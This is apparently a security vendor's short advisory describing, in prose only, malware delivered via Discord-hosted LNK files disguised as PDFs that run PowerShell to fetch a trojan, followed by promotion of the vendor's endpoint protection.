LNK files are nothing new, PDF files are nothing new. LNK files masquerading as LNK files are also nothing new on the threat landscape.
Now this is where it gets a bit more interesting as threat actors are leveraging Discord (also not new) to distribute payloads. You can link to a payload on Discord directly which means you can have a public server which links to a malicious file (Discord does not scan files) and make it accessible far and wide.
The malicious file could be something like the above (LNK file masquerading as a PDF) which then downloads something malicious, before you know it your machine is compromised (especially if there is powershell scripting as part of the payload).
Example of what we are looking at (video):
- Malicious link provided to a file housed on Discord
- File is a LNK being disguised as a PDF file
- LNK file was PowerShell code designed to download and run a malicious payload
- EXE file hits the machine and is launched.
- Endpoint is compromised. This is generally a trojan to grant access to threat actors.
It happens that quickly but there is a silver lining. Our security stack is capable of preventing the LNK file outright! Other solutions are not that successful and it gets to the point of running the PowerShell script, more good news on our side – we kill the PS script based on our contextual scripting engine.
This is why we leverage the best security solution possible and why it proves time after time to be the best choice when it comes to endpoint security. Prevention is far better than “wait and see” (also know as detect and response/detect and remediate).
Thank you for your attention to this matter. If you have any questions or concerns, do not hesitate to reach out.